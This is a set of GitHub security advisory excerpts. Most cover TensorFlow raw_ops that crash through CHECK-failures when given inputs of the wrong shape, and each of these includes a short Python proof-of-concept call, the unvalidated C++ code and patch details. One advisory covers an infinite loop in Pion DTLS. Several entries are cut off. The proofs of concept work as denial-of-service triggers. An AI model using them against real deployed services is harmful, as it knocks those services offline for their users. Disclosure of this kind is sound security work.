ghsa

### Impact The implementation of [`tf.raw_ops.LSTMBlockCell`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/rnn/lstm_ops.cc) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.raw_ops.LSTMBlockCell( x=tf.constant(0.837607, shape=[28,29], dtype=tf.float32), cs_prev=tf.constant(0, shape=[28,17], dtype=tf.float32), h_prev=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32), w=tf.constant(0.887386262, shape=[46,68], dtype=tf.float32), wci=tf.constant(0, shape=[], dtype=tf.float32), wcf=tf.constant(0, shape=[17], dtype=tf.float32), wco=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32), b=tf.constant(0.75259006, shape=[68], dtype=tf.float32), forget_bias=1, cell_clip=0, use_peephole=False) ``` The code does not validate the ranks of any of the arguments to this API call...

### Impact The implementation of [`tf.raw_ops.LoadAndRemapMatrix`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/load_and_remap_matrix_op.cc#L70-L98) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf ckpt_path = tf.constant( "/tmp/warm_starting_util_test5kl2a3pc/tmpph76tep2/model-0", shape=[], dtype=tf.string) old_tensor_name = tf.constant( "/tmp/warm_starting_util_test5kl2a3pc/tmpph76tep2/model-0", shape=[], dtype=tf.string) row_remapping = tf.constant(0, shape=[], dtype=tf.int64) col_remapping = tf.constant(3, shape=[3], dtype=tf.int64) initializing_values = tf.constant([], shape=[0, 1], dtype=tf.float32) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_va...

### Impact The implementation of [`tf.raw_ops.SparseTensorToCSRSparseMatrix`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse/sparse_tensor_to_csr_sparse_matrix_op.cc#L65-L119) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf indices = tf.constant(53, shape=[3], dtype=tf.int64) values = tf.constant(0.554979503, shape=[218650], dtype=tf.float32) dense_shape = tf.constant(53, shape=[3], dtype=tf.int64) tf.raw_ops.SparseTensorToCSRSparseMatrix( indices=indices, values=values, dense_shape=dense_shape) ``` The code assumes `dense_shape` is a vector and `indices` is a matrix (as part of requirements for sparse tensors) but there is no validation for this: ```cc const Tensor& indices = ctx->input(0); const Tensor& values = ctx->input(1); const Tensor& dense_shape = ctx->input(...

### Impact The implementation of [`tf.raw_ops.UnsortedSegmentJoin`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/unsorted_segment_join_op.cc#L92-L95) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.raw_ops.UnsortedSegmentJoin( inputs=tf.constant("this", shape=[12], dtype=tf.string), segment_ids=tf.constant(0, shape=[12], dtype=tf.int64), num_segments=tf.constant(0, shape=[12], dtype=tf.int64)) ``` The code assumes `num_segments` is a scalar but there is no validation for this before accessing its value: ```cc const Tensor& num_segments_tensor = context->input(2); OP_REQUIRES(context, num_segments_tensor.NumElements() != 0, errors::InvalidArgument("Number of segments cannot be empty.")); auto num_segments = num_segments_tensor.scalar<NUM_SEGMENTS_TYPE>()(); ``` ### Patches...

### Impact The implementation of [`tf.raw_ops.Conv3DBackpropFilterV2`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/conv_grad_ops_3d.cc) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.raw_ops.Conv3DBackpropFilterV2( input=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16), filter_sizes=tf.constant(0, shape=[], dtype=tf.int32), out_backprop=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16), strides=[1, 1, 1, 1, 1], padding="VALID", data_format="NDHWC", dilations=[1, 1, 1, 1, 1]) ``` The code does not validate that the `filter_sizes` argument is a vector. ### Patches We have patched the issue in GitHub commit [174c5096f303d5be7ed2ca2662b08371bff4ab88](https://github.com/tensorflow/tensorflow/commit/174c5096f303d5be7ed2ca2662b08371bff4ab88). The fix will ...

### Impact The implementation of [`tf.raw_ops.StagePeek`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/stage_op.cc#L261) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf index = tf.constant([], shape=[0], dtype=tf.int32) tf.raw_ops.StagePeek(index=index, dtypes=[tf.int32]) ``` The code assumes `index` is a scalar but there is no validation for this before accessing its value: ```cc std::size_t index = ctx->input(0).scalar<int>()(); ``` ### Patches We have patched the issue in GitHub commit [cebe3c45d76357d201c65bdbbf0dbe6e8a63bbdb](https://github.com/tensorflow/tensorflow/commit/cebe3c45d76357d201c65bdbbf0dbe6e8a63bbdb). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and...

### Impact The implementation of [`tf.raw_ops.DeleteSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L128-L144) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf handle = tf.constant("[]", shape=[0], dtype=tf.string) tf.raw_ops.DeleteSessionTensor(handle=handle) ``` The code assumes `handle` is a scalar but there is no validation for this: ```cc const Tensor& handle = ctx->input(0); const string& name = handle.scalar<tstring>()(); ``` ### Patches We have patched the issue in GitHub commit [cff267650c6a1b266e4b4500f69fbc49cdd773c5](https://github.com/tensorflow/tensorflow/commit/cff267650c6a1b266e4b4500f69fbc49cdd773c5). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4...

### Impact The implementation of [`tf.raw_ops.QuantizeAndDequantizeV4Grad`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L148-L226) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=tf.constant(1, shape=[2,2], dtype=tf.float64), input=tf.constant(1, shape=[2,2], dtype=tf.float64), input_min=tf.constant([], shape=[0], dtype=tf.float64), input_max=tf.constant(-10, shape=[], dtype=tf.float64), axis=-1) ``` The code assumes `input_min` and `input_max` are scalars but there is no validation for this. ### Patches We have patched the issue in GitHub commit [098e7762d909bac47ce1dbabe6dfd06294cb9d58](https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58). The fix will be included ...

### Impact The implementation of [`tf.raw_ops.GetSessionTensor`](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/session_ops.cc#L94-L112) does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf handle = tf.constant("[]", shape=[0], dtype=tf.string) tf.raw_ops.GetSessionTensor(handle=handle) ``` The code assumes `handle` is a scalar but there is no validation for this: ```cc const Tensor& handle = ctx->input(0); const string& name = handle.scalar<tstring>()(); ``` ### Patches We have patched the issue in GitHub commit [48305e8ffe5246d67570b64096a96f8e315a7281](https://github.com/tensorflow/tensorflow/commit/48305e8ffe5246d67570b64096a96f8e315a7281). The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as th...

### Impact An attacker can send packets that will send Pion DTLS into an infinite loop when processing. ### Patches Upgrade to Pion DTLS v2.1.4 ### Workarounds No workarounds available, upgrade to Pion DTLS v2.1.4 ### References Thank you to [Juho Nurminen](https://github.com/jupenur) and the Mattermost team for discovering and reporting this. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Pion DTLS](http://github.com/pion/dtls) * Email us at [[email protected]](mailto:[email protected])